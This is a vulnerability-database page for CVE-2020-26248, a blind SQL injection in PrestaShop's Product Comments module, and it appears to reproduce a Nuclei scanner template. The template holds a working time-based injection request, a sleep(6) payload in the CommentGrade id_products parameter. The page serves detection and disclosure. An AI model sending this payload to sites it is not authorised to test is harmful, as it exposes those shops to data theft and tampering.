CVE-2020-26248: PrestaShop Product Comments <4.2.0 - SQL Injection

日期: 2025-08-01 | 影响软件: PrestaShop | POC: 已公开

漏洞描述

PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2020-26248

info:
  name: PrestaShop Product Comments <4.2.0 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: Fixed in 4.2.1.
  reference:
    - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
    - https://packagist.org/packages/prestashop/productcomments
    - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
    - https://nvd.nist.gov/vuln/detail/CVE-2020-26248
    - https://github.com/PrestaShop/productcomments/commit/7c2033dd811744e021da8897c80d6c301cd45ffa
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
    cvss-score: 8.2
    cve-id: CVE-2020-26248
    cwe-id: CWE-89
    epss-score: 0.8099
    epss-percentile: 0.99119
    cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: prestashop
    product: productcomments
    framework: prestashop
  tags: time-based-sqli,cve,cve2020,packetstorm,sqli,prestshop,prestashop

http:
  - raw:
      - |
        @timeout: 20s
        GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "average_grade")'
        condition: and
# digest: 490a0046304402200a9198587f20165634766149b25ea99b6cc1948b27dd68194eacde614030da5e02206af293247aa00467413afeb566c8a6af716503618aec8e822b51193bd2d91f88:922c64590222798bb761d5b6d8e72950

相关漏洞推荐